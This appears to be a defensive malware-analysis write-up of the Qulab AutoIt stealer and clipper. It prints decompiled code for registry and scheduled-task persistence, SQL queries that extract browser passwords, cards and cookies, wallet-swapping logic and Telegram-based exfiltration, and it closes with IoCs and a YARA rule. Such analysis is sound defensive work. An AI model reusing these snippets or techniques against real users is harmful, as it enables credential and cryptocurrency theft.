On my side, I will not explain the steps or tools used to extract the code; there are plenty of tutorials on the internet explaining how to extract AutoIt scripts. The idea here is to focus mainly on the malware, not on the extraction part...
Code Obfuscation
After extracting the code from the PE, it's easy to guess that some amazing stuff is coming just by looking at the amount of code... The analysis of this malware will be a challenge of some kind.
cat Qulab.au3 | wc -l
21952 // some pain incoming
The source code is really (really) obfuscated, but not hard to clean. It just takes quite some time, with the help of homemade scripts, to get through it. But for an analyst who simply wants information, a dump of the process during execution plus a sandbox report is sufficient to understand the main tasks.
For non-technical people, I have created a dedicated page on GitHub to make it easy to read and learn the AutoIT fundamentals. I highly recommend keeping it open while reading this article; it will make things easier. You should also read the official AutoIT FAQ to understand the API. Unfortunately, it's not as complete as the Microsoft MSDN documentation, but it's enough for the basic principles of this language...
It's impossible to explain every form of obfuscation in this malware, but here is a summary of the main tricks.
- Variable & Function Naming convention
All variables, with few exceptions, follow this form:
\$A\d[A-F0-9]{3,10}
It's wonderful to see over ten thousand (and more) variables like this in the whole script (sarcasm)
$A18A4000F15
$A5AA4204E10
$A0FA4403A33
$A55A4601801
$A24A4804C5C
...
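The naming pattern above is handy for measuring how much of a script is obfuscated, or as a first step before renaming. Here is a small sketch that applies the same regex; the helper name is mine, and the sample line is one of the initialization lines quoted in this article.

```python
import re

# Same pattern as the one given above for obfuscated variable names.
OBFUSCATED_VAR = re.compile(r"\$A\d[A-F0-9]{3,10}")


def find_obfuscated_vars(source: str) -> list:
    """Return the sorted, de-duplicated obfuscated variable names in `source`."""
    return sorted(set(OBFUSCATED_VAR.findall(source)))


sample = "IF $A4A7AC0550A=DEFAULT THEN $A4A7AC0550A=-NUMBER($A198A005329)"
print(find_obfuscated_vars(sample))
```

Mapping each name to a readable placeholder (var_0001, var_0002, ...) is then a simple substitution pass over the script.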
- Garbage conditions
When code is obfuscated, there is obviously a huge amount of nonsense conditions or unused functions. It doesn't take long to get the idea with Qulab, because they are easily caught by pure logic. Take this one as an example:
FUNC A5D10600720(BYREF $A37E6C01A00,$A183A702F3C)
    IF NOT ISDECLARED("SSA5D10600720") THEN
    ENDIF
    ...
    ...
ENDFUNC
This is a classic pattern: the condition just checks whether a variable ("SS" + function name) is not declared. Inside, there are always some local variables initialized for the purposes of the function, and most of the time they come from the master array. After deobfuscation, every condition following this pattern can be removed and the variables replaced by their corresponding values, which allows a lot of code to be deleted.
- Unused Functions
Another classic scheme is to look for unused functions. This allows thousands of lines of junk code to be cleaned effectively, either by writing a script for the purpose or by using some user-defined functions made by the AutoIT community.
- Initiating Variables and using them
GLOBAL LOCAL $VARIABLE_1 = FUNC1(ARRAY[POS])
...Code....
GLOBAL LOCAL $VARIABLE_455 = $VARIABLE_1
...Code...
GLOBAL LOCAL $VARIABLE_9331 = $VARIABLE_455 <- Final Value
> Initiating them by a condition
IF $A4A7AC0550A=DEFAULT THEN $A4A7AC0550A=-NUMBER($A198A005329)
IF $A2F7AD03E54=DEFAULT THEN $A2F7AD03E54=-NUMBER($A2C8A10261F)
IF $A3D7AE0071E=DEFAULT THEN $A3D7AE0071E=-NUMBER($A218A202B4D)
IF $A3F7AF01354=DEFAULT THEN $A3F7AF01354=-NUMBER($A2A8A300E5F)
> Using a counter variable in a 2D array, with a value that is stored inside a 20,000-length array.
$A31E5E11A1F[NUMBER($A2646512725)][NUMBER($A0C46615D39)]+=NUMBER($A5246713208)
> Hiding error code integers behind a mixture of multiple functions and variables.
RETURN SETERROR($A2C07504A0A,NUMBER($A411740414D),NUMBER($A6017502D45))
Code Execution
This malware has an unorthodox way of executing code, and it's pretty cool.
- Read the directives and follow them to reach the main function
- The main function will set up the master array (I will explain this later)
- When this function is done, the script goes back to the beginning, right after the directives, and looks for global variables and instructions; in our case, it will be some global variables.
- When all of the global variables have been initialized, it skips all the functions because they are simply not called (for the moment), and tries to reach some exploitable instruction (as I explained above).
- When some code is finally reachable, a domino effect occurs: an initialized variable calls one function, which in turn calls one or multiple functions, and so on.
- During the same process, there are also some encoded files hardcoded in the script that are injected into the code for specific tasks. When all setup tasks are done, it enters an infinite loop for specific purposes.
In the end, it could be schematized like this.
Directives are leading the road path
Everything that starts with "#" is a directive. This is technically the first thing that the script checks, and here it's configured to go, at all costs, to a specific function named "A5300003647_", which is the main function.
#ะกะชะะะะกะฌ ะะขะกะฎะะะ ะะฃะะ ะขะซ ะกะกะะะะฏ ะะะฏะฅะ ะะฃะฅะ
#NoTrayIcon
#OnAutoItStartRegister "A5300003647_"
#NoTrayIcon - Hides the AutoIT icon in the system tray
#OnAutoItStartRegister - Registers the first function that will be called at the beginning of the script (an equivalent of the main function)
The Main function is VIP
The first function of Qulab is critical because this is where almost all the data is initialized for the tasks. The variable $DLIT stores a "huge" string that is split on the delimiter "o2B2Ct" and stored into the array $OS.
Note: the name mentioned here is the one that will be used for this stealer script, results may vary between samples but the idea remains the same.
FUNC A5300003647_()
    FOR $AX0X0XA=1 TO 5
        LOCAL $DLIT="203020o2B2Ct203120o..."
        GLOBAL $A5300003647,$OS=STRINGSPLIT($DLIT,"o2B2Ct",1)
        IF ISARRAY($OS) AND $OS[0]>=19965 THEN EXITLOOP
        SLEEP(10)
    NEXT
ENDFUNC
Global Variables are the keys
Global variables are certainly the main focus of Qulab. They are nowhere and everywhere, and they are so tightly coupled with the master array that modifying a single variable can have a domino effect on the whole malware, ending in a segmentation fault or anything else that could crash the script.
When a variable is initialized, there are multiple steps behind it:
- Selecting a specific value from the master array
- Converting the value to a string
- Profit
GLOBAL $A1D7450311E=A5300003647($OS[1])
The function "A5300003647" is, in fact, an equivalent of a "From Hex" feature: it converts the value two hex characters (one byte) at a time.
FUNC A5300003647($A5300003647)
    LOCAL $A5300003647_
    FOR $X=1 TO STRINGLEN($A5300003647) STEP 2
        $A5300003647_&=CHR(DEC(STRINGMID($A5300003647,$X,2)))
    NEXT
    RETURN $A5300003647_
ENDFUNC
By just tweaking the instructions of the AutoIT script, with the help of some adjustments (thanks to homemade deobfuscation scripts and patience), the variables are now almost fully readable.
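For illustration, the decoding step can be reproduced outside of AutoIT. The following Python sketch is not my actual deobfuscation script: the helper names `from_hex`, `build_master_array` and `inline_strings` are hypothetical, and the input is limited to the two master array entries visible in the snippet above.

```python
import re

DELIMITER = "o2B2Ct"  # delimiter seen in the sample analyzed above


def from_hex(value: str) -> str:
    """Mirror of the A5300003647 helper: two hex digits become one character."""
    return "".join(chr(int(value[i:i + 2], 16)) for i in range(0, len(value), 2))


def build_master_array(blob: str) -> list[str]:
    # STRINGSPLIT returns a 1-based array with the element count in slot 0,
    # so a placeholder keeps the indices aligned with $OS[n].
    return [""] + [from_hex(part) for part in blob.split(DELIMITER)]


def inline_strings(script: str, master: list[str]) -> str:
    """Replace every A5300003647($OS[n]) call with the decoded string literal."""
    def repl(match: re.Match) -> str:
        decoded = master[int(match.group(1))]
        # AutoIt escapes a double quote inside a string by doubling it.
        return '"' + decoded.replace('"', '""') + '"'
    return re.sub(r"A5300003647\(\$OS\[(\d+)\]\)", repl, script)


master = build_master_array("203020o2B2Ct203120")
print(inline_strings("GLOBAL $A1D7450311E=A5300003647($OS[1])", master))
```

Running the same substitution over the whole script is what turns thousands of `$OS[n]` lookups into readable literals.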
After modifying our 19966 variables (that's a lot), we can clearly see, statically, most of the tasks that the malware has in the pipeline. This doesn't mean that this part is done: it's only a first draft and it needs to be cleaned again, because there are a lot of unfinished tasks and of course, as I explained above, most of them are unused.
Main code
After all that mess to understand the correct path to read the code, the script now enters its core step. The more serious business begins right now.
To summarize all the tasks, this is briefly what's going on:
- Setting up the variables that are configured in the builder
  - Name of the payload
  - Name of the scheduled task
  - Name of the scheduled task folder
  - Name of the hidden AppData folder where the malware will do the tasks
  - Wallets
- Hide itself
- Do all the stealing tasks
- Decode & load dependencies when required
- Set up the persistence
- And more...
Where is the exit?
Between two functions, there are sometimes Global variables being declared, or sneaky calls that have an impact on the payload itself. They cannot really be seen at first glance, because they are drowned in a huge amount of code, so one or two lines between dozens of functions are easily overlooked.
We can see that one of them also indicates the specific function that will be called at the end of everything.
ONAUTOITEXITREGISTER("A1AA3F04218")
So with just a little research, we can find the function that will be called at the end of the script, in the middle of a huge amount of spaghetti code.
It is, in fact, closing the crypt32.dll module, which is used for the CryptoAPI.
GLOBAL $A1A48943E37=DLLOPEN("crypt32.dll")
Some curiosities to disclose
Homemade functions or already made?
For most of the tasks, the malware uses a lot of "User Defined Functions" (UDF) with some tweaks. As explained in the AutoIT FAQ: "These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer". It confirms more and more that open-source code and programming forums are useful for both sides (good & bad), so developing malware doesn't require being a wizard: everything is available and free.
Also for Qulab, it's confirmed that he used tweaked or original UDFs for:
- SQL content
- Archiving content
- Telegram API
- Windows API
- Memory usage
Memory optimization
AutoIT programs are known to be greedy in memory consumption, which could make them easier to detect. At multiple points, the malware runs a task that tries to reduce the amount of allocated memory by removing as many pages as possible from the working set of the process. This relies on EmptyWorkingSet and could cut the memory usage of the program by half.
FUNC A0E64003F0C($A1B85D1000C=0)
    IF NOT $A1B85D1000C THEN $A1B85D1000C=EXECUTE(" @AutoItPID ")
    LOCAL $A3485F11D1D=DLLCALL("kernel32.dll","handle","OpenProcess","dword",(($A209DF54B2B<1536)?1280:4352),"bool",0,"dword",$A1B85D1000C)
    IF @ERROR OR NOT $A3485F11D1D[0] THEN RETURN SETERROR(@ERROR+20,@EXTENDED,0)
    LOCAL $A5F55F1392E=DLLCALL(EXECUTE(" @SystemDir ")&"\psapi.dll","bool","EmptyWorkingSet","handle",$A3485F11D1D[0])
    RETURN 1
ENDFUNC
First, it grabs the PID of the AutoIT-compiled program by executing the macro @AutoItPID, then opens the process with OpenProcess. But one of the arguments is quite obscure:
(($A209DF54B2B<1536)?1280:4352)
What is behind the variable $A209DF54B2B? Let's dig into it...
GLOBAL CONST $A209DF54B2B=A2054F01A5F()
FUNC A2054F01A5F()
    LOCAL $A1656715F1D=DLLSTRUCTCREATE("struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct")
    DLLSTRUCTSETDATA($A1656715F1D,1,DLLSTRUCTGETSIZE($A1656715F1D))
    LOCAL $A5F55F1392E=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$A1656715F1D)
    IF @ERROR OR NOT $A5F55F1392E[0] THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
    RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($A1656715F1D,2),-8),DLLSTRUCTGETDATA($A1656715F1D,3))
ENDFUNC
This WinAPI function retrieves the version of the operating system currently running on the machine. The script packs the result into a single integer (major version shifted left by 8 bits, OR-ed with the minor version), so we can look back and compare it with the official API constants.
//
// _WIN32_WINNT version constants
//
#define _WIN32_WINNT_NT4          0x0400 // Windows NT 4.0
#define _WIN32_WINNT_WIN2K        0x0500 // Windows 2000
#define _WIN32_WINNT_WINXP        0x0501 // Windows XP
#define _WIN32_WINNT_WS03         0x0502 // Windows Server 2003
#define _WIN32_WINNT_WIN6         0x0600 // Windows Vista
#define _WIN32_WINNT_VISTA        0x0600 // Windows Vista
#define _WIN32_WINNT_WS08         0x0600 // Windows Server 2008
#define _WIN32_WINNT_LONGHORN     0x0600 // Windows Vista
#define _WIN32_WINNT_WIN7         0x0601 // Windows 7
#define _WIN32_WINNT_WIN8         0x0602 // Windows 8
#define _WIN32_WINNT_WINBLUE      0x0603 // Windows 8.1
#define _WIN32_WINNT_WINTHRESHOLD 0x0A00 // Windows 10
#define _WIN32_WINNT_WIN10        0x0A00 // Windows 10
The threshold 1536 is 0x0600, i.e. Windows Vista. Knowing the Windows version thanks to this function, the AutoIT script is able to open the process with the access rights that fit the system. The last task is to purge the unused working set by calling EmptyWorkingSet to free some unnecessary memory.
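To make the obscure argument easier to read, here is a small Python sketch that redoes the same arithmetic with named constants. The constant values are the documented Windows process access rights; the helper names `pack_version` and `access_mask` are mine and purely illustrative.

```python
# Documented Windows process access rights.
PROCESS_SET_QUOTA = 0x0100
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
WIN32_WINNT_VISTA = 0x0600  # 1536 in decimal


def pack_version(major: int, minor: int) -> int:
    """Same packing as BITOR(BITSHIFT(major, -8), minor) in the script."""
    return (major << 8) | minor


def access_mask(version: int) -> int:
    """Pick the OpenProcess access mask the way the ternary expression does."""
    if version < WIN32_WINNT_VISTA:
        # Before Vista, the "limited" query right does not exist.
        return PROCESS_QUERY_INFORMATION | PROCESS_SET_QUOTA
    return PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_QUOTA


print(hex(pack_version(6, 1)), access_mask(pack_version(6, 1)))  # Windows 7
print(hex(pack_version(5, 1)), access_mask(pack_version(5, 1)))  # Windows XP
```

So 1280 and 4352 are simply the two flag combinations that EmptyWorkingSet needs on the handle: a query right plus PROCESS_SET_QUOTA.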
Task scheduling
Task scheduling with stealers usually boils down to one line of code: a simple and effective ShellExecute command with schtasks.exe to execute something periodically, as a persistence trick. Here it's a little bit more advanced than usual on multiple points, by using a TaskService object.
$A60FD553516=OBJCREATE("Schedule.Service")
$A60FD553516.Connect()
The new task is created with a flag value of 0. As explained in the MSDN documentation, it's a mandatory value.
$A489E853A1E=$A60FD553516.NewTask(0)
To be less detectable, some tricks are used to look as legitimate as possible: the task is registered as created by the correct user, and the description, the name of the task and the task folder are adjusted to what the customer wants.
$A4A9E951E11=$A489E853A1E.RegistrationInfo()
$A4A9E951E11.Description()= $A487E851D38
$A4A9E951E11.Author()=EXECUTE(" @LogonDomain ")&"\"&EXECUTE(" @UserName ")
After some other required values are configured, which are not really worth discussing, the settings part of this Task Service is far more interesting.
To maximize the yield, Qulab tweaks the task so that it runs whatever the situation:
- The laptop is not charging
- The battery is low
- Network available or not
In the end, every minute, the Task Scheduler will run the task by executing the malware from the hidden folder in %APPDATA%.
$A4B9EA50562=$A489E853A1E.Settings()
$A4B9EA50562.MultipleInstances() = 0
$A4B9EA50562.DisallowStartIfOnBatteries()= FALSE
$A4B9EA50562.StopIfGoingOnBatteries()= FALSE
$A4B9EA50562.AllowHardTerminate()= TRUE
$A4B9EA50562.StartWhenAvailable()= TRUE
$A4B9EA50562.RunOnlyIfNetworkAvailable()= FALSE
$A4B9EA50562.Enabled()= TRUE
$A4B9EA50562.Hidden()= TRUE
$A4B9EA50562.RunOnlyIfIdle()= FALSE
$A4B9EA50562.WakeToRun()= TRUE
$A4B9EA50562.ExecutionTimeLimit()= "PT1M" ; Default PT99999H
$A4B9EA50562.Priority()= 3 ; Default 5
$A3E9EB51B0D=$A489E853A1E.Principal()
$A3E9EB51B0D.Id()=EXECUTE(" @UserName ")
$A3E9EB51B0D.DisplayName()=EXECUTE(" @UserName ")
$A3E9EB51B0D.LogonType()=$A0B8E352D04
$A3E9EB51B0D.RunLevel()= 0
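From the defender's side, this combination of settings is a usable hunting signal. The Python sketch below is an assumption-heavy illustration: it parses a trimmed, hypothetical task definition in the Task Scheduler XML schema and lists which of the settings above are present. The function name `suspicious_settings` and the sample XML are mine; a real exported task contains many more elements. Note that ExecutionTimeLimit only bounds how long one instance may run; the repetition interval itself lives in a trigger, which is not part of the excerpt above.

```python
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler XML schema.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def suspicious_settings(xml_text: str) -> list[str]:
    """Return the reasons why a task definition resembles the Qulab task."""
    root = ET.fromstring(xml_text)

    def setting(name: str, default: str) -> str:
        # Missing elements fall back to the given default value.
        return root.findtext(f"t:Settings/t:{name}", default=default, namespaces=NS).strip().lower()

    reasons = []
    if setting("Hidden", "false") == "true":
        reasons.append("hidden task")
    if setting("WakeToRun", "false") == "true":
        reasons.append("wakes the machine to run")
    if setting("DisallowStartIfOnBatteries", "true") == "false":
        reasons.append("starts on battery")
    if setting("ExecutionTimeLimit", "") == "pt1m":
        reasons.append("one-minute execution time limit")
    return reasons


# Hypothetical, trimmed task definition used only for illustration.
SAMPLE = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Settings>
    <Hidden>true</Hidden>
    <WakeToRun>true</WakeToRun>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <ExecutionTimeLimit>PT1M</ExecutionTimeLimit>
  </Settings>
</Task>"""

print(suspicious_settings(SAMPLE))
```

None of these settings is malicious on its own, so the result is better treated as a score than as a verdict.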
Another Persistence?
A classic one is used:
IF NOT A3F64500C0D($A00DEB51215,$A35DEF51B61) THEN REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", $A00DEB51215,"REG_SZ",""""&$A104A053309&"\"&$A60DE955B5F&"""")
There is not much more to say about this part...
Encoding is not encryption
When I was digging into the code, I found a mistake that made me laugh a little... the classic claim that base64 is encryption. So maybe after this in-depth analysis, the malware developer will fix his mistake (or just insult me :') )
Malware Features
Clipper
If you are unfamiliar with what a clipper is, it's in fact really simple... The idea is to alter the clipboard content with the help of some filters/rules, which in most cases are expressed as regular expressions. If the content matches one of them, the matched data is replaced with something else that was configured. It's heavily used for swapping crypto wallet IDs from the victim's to the attacker's. This is also the case with Qulab, which focuses on wallets & Steam trade links.
This piece of code represents the core of the clipper:
So these are the steps:
- Execute a script to check if there is any new data to send to the attacker
- Check if the ongoing task is present in the Task Scheduler
- Clean the unnecessary working set (see the memory optimization explained above)
- Pause the loop for 200 ms
- Get the content of the clipboard with CLIPGET
- Check all the wallet patterns; if one matches, substitute it with the desired value
- Put the modified content on the clipboard with CLIPPUT
- Repeat
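Seen from the victim's side, the matching step above can be turned around to detect a swap. The Python sketch below is only an illustration: the two regular expressions are simplified assumptions (not the rules used by Qulab), and the helper names `wallet_kind` and `looks_like_swap` are hypothetical.

```python
import re
from typing import Optional

# Simplified, illustrative patterns (assumptions, not Qulab's real rules).
WALLET_PATTERNS = {
    "bitcoin": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_kind(text: str) -> Optional[str]:
    """Return the kind of wallet the text looks like, or None."""
    candidate = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(candidate):
            return kind
    return None


def looks_like_swap(copied: str, pasted: str) -> bool:
    """True when a wallet-like string came back as a different one of the same kind."""
    kind = wallet_kind(copied)
    return (
        kind is not None
        and kind == wallet_kind(pasted)
        and copied.strip() != pasted.strip()
    )


copied = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
pasted = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
print(looks_like_swap(copied, pasted))
```

The check is the same idea as the clipper loop, just read-only: compare what was copied with what is about to be pasted, and raise a flag when both look like the same kind of address but differ.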
All the values for the different wallets that the attacker wants to swap are stored at the beginning of the code section. This is pure speculation, but I assume these are the values that are configured in the builder.
Current list of cryptocurrency wallets that the stealer is switching:
Bitcoin | Bitcoin Cash | Bitcoin Gold | Bytecoin |
Cardano | Lisk | Dash | Doge |
Electroneum | Ethereum | Graft | Litecoin |
Monero | Neo | QIWI | Qtum |
Steam Trade Link | Stratis | VIA | WME |
WMR | WMU | WMX | WMZ |
Waves | Yandex Money | ZCash |
Browser Stealer
Qulab is a kind of puzzle with multiple pieces, where each piece is another puzzle. Collecting and sorting them to solve the entire fresco is quite a challenge. I must admit that for the browser part, even if the concept is easy and will always remain the same (for the fundamentals of a password stealer), the way it was implemented is somewhat clever.
At first, every browser supported by the malware is checked in turn, with specific arguments:
- The browser path
- The files that the stealer wants to grab, with "|" as a delimiter
- The name of the browser
It goes to a very important function that searches (not only for browsers) for these kinds of files:
- wallet.dat
- Login Data
- formhistory.sqlite
- Web Data
- cookies.sqlite
- Cookies
- .maFile
If they match, it enters a loop that saves each path entry into one master variable, with "|" as a delimiter between every important file.
When all the files are found, it only needs some regular expressions to filter and split the data that the malware wants to grab.
After inspecting and storing data from the browsers present in the list, serious business is now in the pipeline... One of the binaries hardcoded in base64 is finally decoded and used to get some juicy data and, like every time, it's the popular SQLite3.dll that was hidden inside all of this.
Something interesting to notice is that the developer made some adjustments to the official AutoIT UDF for SQLite3 and removed all the network tasks, to avoid downloading the libraries (32 or 64 bits) and of course to be less detectable.
The file is saved into the %ROAMING% directory, and will have the name:
- PE_Name + ".sqlite3.module.dll"
The routine remains the same each time this library is required:
- Checking, with a patched _SQLite_GetTable2d, that the SQL statement that needs to be executed is a valid one.
- The SQL table is walked in a loop and each row of the array is verified against a specific regular expression.
- If the content is found, it enters another condition that simply adds it to the list of files & information that will be pushed into the malicious archive.
In the end, these requests are executed on browser files:
SELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards;
SELECT username_value, password_value, origin_url, action_url FROM logins;
select host, 'FALSE' as flag, path, case when isSecure = 1 then 'TRUE' else 'FALSE' end as secure, expiry, name, value from moz_cookies;
select host_key, 'FALSE' as flag, path, case when is_secure = 1 then 'TRUE' else 'FALSE' end as secure, expires_utc, name, encrypted_value from cookies;
Current List of supported browsers
360 Browser | Amigo | AVAST Browser | Blisk | Breaker Browser |
Chromium | Chromodo | CocCoc | CometNetwork Browser | Comodo Dragon |
CyberFox | Flock Browser | Ghost Browser | Google Chrome | IceCat |
IceDragon | K-Meleon Browser | Mozilla Firefox | NETGATE Browser | Opera |
Orbitum Browser | Pale Moon | QIP Surf | SeaMonkey | Torch |
UCBrowser | uCOZ Media | Vivaldi | Waterfox | Yandex Browser |
FTP
The FTP part is rudimentary but does the job. As far as I can tell, it's only targeting the FileZilla software.
Grabber
Qulab doesn't have an advanced Grabber feature; it's really simplistic compared to stealers like Vidar. It boils down to one simple line... It uses the same function as explained above for the browsers, with the only difference that it searches for specific file formats in the desktop directory.
Targeted files are:
- .txt
- .maFile
- wallet.dat
Wallet
Nothing more to say than that Exodus is the main target.
Discord
Discord is more and more popular nowadays, so it's now routine to see this software targeted by almost all the current password stealers on the market.
Steam & Steam Desktop Authenticator
The routine for Steam is almost identical to the one that I explained for Predator, and it will remain the same until Steam changes something in the security of its files (or just changes their naming convention).
- Finding the Steam path in the registry
- Searching for the config folder
- Searching recursively into it to grab all the ssfn files
But! There is something different in this password stealer compared to all the others that I've seen so far. It's also targeting Steam Desktop Authenticator, a third-party software described on its official page as a desktop implementation of Steam's mobile authenticator app. It searches for a specific and unique file, ".maFile", which is already mentioned above in the Grabber part and the Browser Stealer part. This file contains sensitive data of the Steam account linked with the Steam mobile authenticator app.
So this malware is heavily targeting Steam:
- Clipping Steam trade links
- Stealing Steam sessions
- Stealing the main 2FA file from a third-party software
Information log
It's common for stealers to have an information file that logs important data from the victim's machine. It's also the case with Qulab. It's not necessary to explain every part, so I'm just showing here which command was used to get each piece of information.
OS Version | @OSVersion |
OS Architecture | @OSArch |
OS Build | @OSBuild |
Username | @UserName |
Computer Name | @ComputerName |
Processor | ExecQuery("SELECT * FROM Win32_Processor","WQL",16+32) |
Video Card | ExecQuery("SELECT * FROM Win32_VideoController","WQL",16+32) |
Memory | STRINGFORMAT("%.2f Gb",MEMGETSTATS()[1]/1024/1024) |
Keyboard Layout ID | @KBLayout |
Resolution | @DesktopWidth & @DesktopHeight & @DesktopDepth & @DesktopRefresh |
- Network
Although it is not seen due to the proxy, there is a network request made to ipapi.co to get all the network information about the victim's machine.
$A4AC5512B62=INETREAD("https://ipapi.co/json",3)
The JSON result is consolidated into one variable and saved for the final log file.
IF STRINGLEN($A4AC5512B62) > 75 THEN
    $A2B1F55481F=A4604603206(BINARYTOSTRING($A4AC5512B62))
    $A280FD53C4B =" - IP: " &A211460135A($A2B1F55481F,"[ip]") & EXECUTE(" @CRLF ") _
        &" - Country: " &A211460135A($A2B1F55481F,"[country_name]") & EXECUTE(" @CRLF ") _
        &" - City: " &A211460135A($A2B1F55481F,"[city]") & EXECUTE(" @CRLF ") _
        &" - Region: " &A211460135A($A2B1F55481F,"[region]") & EXECUTE(" @CRLF ") _
        &" - ZipCode: " &A211460135A($A2B1F55481F,"[postal]") & EXECUTE(" @CRLF ") _
        &" - ISP: " &A211460135A($A2B1F55481F,"[org]") & EXECUTE(" @CRLF ") _
        &" - Coordinates: " &A211460135A($A2B1F55481F,"[latitude]")&", "&A211460135A($A2B1F55481F,"[longitude]")&EXECUTE(" @CRLF ") _
        &" - UTC: " &A211460135A($A2B1F55481F,"[utc_offset]")&" ("&A211460135A($A2B1F55481F,"[timezone]")&")"
ENDIF
- Softs
$A12EF151C00=A5944E0550E("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall","","DisplayName")
FOR $A51E7205400 = 1 TO $A12EF151C00[0][0]
    $A3B1F954B63 &=" - "&$A12EF151C00[$A51E7205400][0]&EXECUTE(" @CRLF ")
NEXT
- Process List
Because AutoIT is designed for automation scripting, almost all the basic commands from the WinAPI are already integrated, so by simply using the ProcessList() call, the list of all the processes is stored into an array.
$A2EEFA54E30=PROCESSLIST()
FOR $A51E7205400=1 TO $A2EEFA54E30[0][0]
    $A481FB54A60&=" - "&$A2EEFA54E30[$A51E7205400][0]&" / PID: "&$A2EEFA54E30[$A51E7205400][1]&EXECUTE(" @CRLF ")
NEXT
By mixing all this data, the log file is finally done:
# /===============================\
# |=== QULAB CLIPPER + STEALER ===|
# |===============================|
# |==== BUY CLIPPER + STEALER ====|
# |=== http://teleg.run/QulabZ ===|
# \===============================/

Date: XX.XX.2019, HH:MM:SS

Main Information:
- ...

Other Information:
- ...

Soft / Windows Components / Windows Updates:
- ...

Process List:
- ...
Instructions log
Probably to help his customers when the malware grabs data from specific software other than browsers, an additional file is added that explains, step by step, how to make use of the stolen data after the stealing process. It is stored as "Инструкция по установке.txt" ("Installation instructions.txt").
Instructions are unique for each of these:
- Exodus
- Discord
- Wallets
- Steam
- Filezilla
- Telegram
- Steam Desktop Authenticator
- Grabber part
Archive Setup

ARCHIVATE($A271F153721)
RUNWAIT($A271F153721&" a -y -mx9 -ssw """&$A104A053309&"\"&$A63CEC52907&".7z"" """&$A104A053309&"\1\*""","",EXECUTE(" @SW_HIDE "))
FILEDELETE($A271F153721)
a | Add |
y | yes on all queries |
mx9 | Ultra Compression Method |
ssw | Compress files open for writing |
In the end, this is an example of a final archive file.
But it is possible to have all these files & folders:
\1\Passwords.txt
\1\Information.txt
\1\Screen.jpg
\1\AutoFills.txt
\1\CreditCards.txt
\1\Cookies
\1\Desktop TXT Files
\1\Discord
\1\Telegram
\1\Steam
\1\Exodus
\1\Wallets
\1\FileZilla
\1\SDA
Cleaning process
Simple and effective:
- Killing the process
- Deleting the script directory
It's easy to catch in the monitoring logs.
Telegram Bot as C2?
This malware uses a Telegram bot for communicating & alerting when data has been stolen. As usual, it's using some UDF functions, so there is nothing really new. It's not really complicated to understand how it works.
When a bot is created, it gets a unique authentication token that can then be used to make requests to it.
api.telegram.org/bot/
Also, it's using a private proxy when sending the request to the bot:
These values are used to configure the proxy setting during the HTTP request :
How it looks like on the other side?
This malware is developed by Qulab, and it took seconds to find the official sale post for his stealer/clipper. As usual, all the marketing information that you want to know about it is detailed.
- This stealer/clipper is sold for 2000 rubles (~$30)
- Support is possible
Let's do some funny stuff
I made some really funny, unexpected content by modifying some instructions to produce something totally unrelated. Patching malware can be really entertaining and interesting!
Note: If you haven't seen the anime "Konosuba", you will not understand at all what's going on :p
Additional Data
IoC
Hashes
- a915fc346ed7e984e794aa9e0d497137
- 887fac71dc7e038bc73dc9362585bf70
IP
- 185.142.97.228
Proxy Port
- 65233
Schedule Task
- %PAYLOAD_NAME%
- Random Description
Folders & Files
- %APPDATA%/%RANDOM_FOLDER%/
- %APPDATA%/%RANDOM_FOLDER%/1/
- %PAYLOAD_NAME%.module.exe (7zip)
- %PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)
Threat Actor
MITRE ATT&CK
- Discovery - System Information Discovery
- Discovery - System Time Discovery
- Discovery - Query Registry
- Discovery - Process Discovery
- Execution - Execution through Module Load
- Credential Access - Credentials in Files
- Collection - Screen Capture
- Collection - Data from Local System
- Exfiltration - Data Compressed
Software & Language used
- AutoIT
- Exe2Aut (Decompiler)
- myAut2Exe (Decompiler)
- CFF Explorer
- x32dbg
- Python
Yara
rule Qulab_Stealer : Qulab {
    meta:
        description = "Yara rule for detecting Qulab (In memory only)"
        author = "Fumik0_"
    strings:
        $s1 = "QULAB CLIPPER + STEALER" wide ascii
        $s2 = "SDA" wide ascii
        $s3 = "SELECT * FROM Win32_VideoController" wide ascii
        $s4 = "maFile" wide ascii
        $s5 = "Exodus" wide ascii
    condition:
        all of ($s*)
}
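If YARA is not at hand, the logic of this rule is simple enough to approximate in a few lines of Python against a memory dump. This is only a rough sketch of what "wide ascii" and "all of" mean here, not a replacement for the rule; the function names `contains` and `matches_qulab` and the test buffer are hypothetical.

```python
MARKERS = [
    "QULAB CLIPPER + STEALER",
    "SDA",
    "SELECT * FROM Win32_VideoController",
    "maFile",
    "Exodus",
]


def contains(buffer: bytes, marker: str) -> bool:
    # "wide ascii" in YARA: match either the plain ASCII bytes or the
    # UTF-16LE form, where every character is followed by a zero byte.
    return marker.encode("ascii") in buffer or marker.encode("utf-16-le") in buffer


def matches_qulab(buffer: bytes) -> bool:
    # Equivalent of the "all of ($s*)" condition.
    return all(contains(buffer, marker) for marker in MARKERS)


# Hypothetical buffer mixing ASCII and wide strings, as a memory dump would.
dump = b"\x00".join(
    [
        "QULAB CLIPPER + STEALER".encode("utf-16-le"),
        b"SDA",
        "SELECT * FROM Win32_VideoController".encode("utf-16-le"),
        b"x.maFile",
        b"Exodus",
    ]
)
print(matches_qulab(dump))
```

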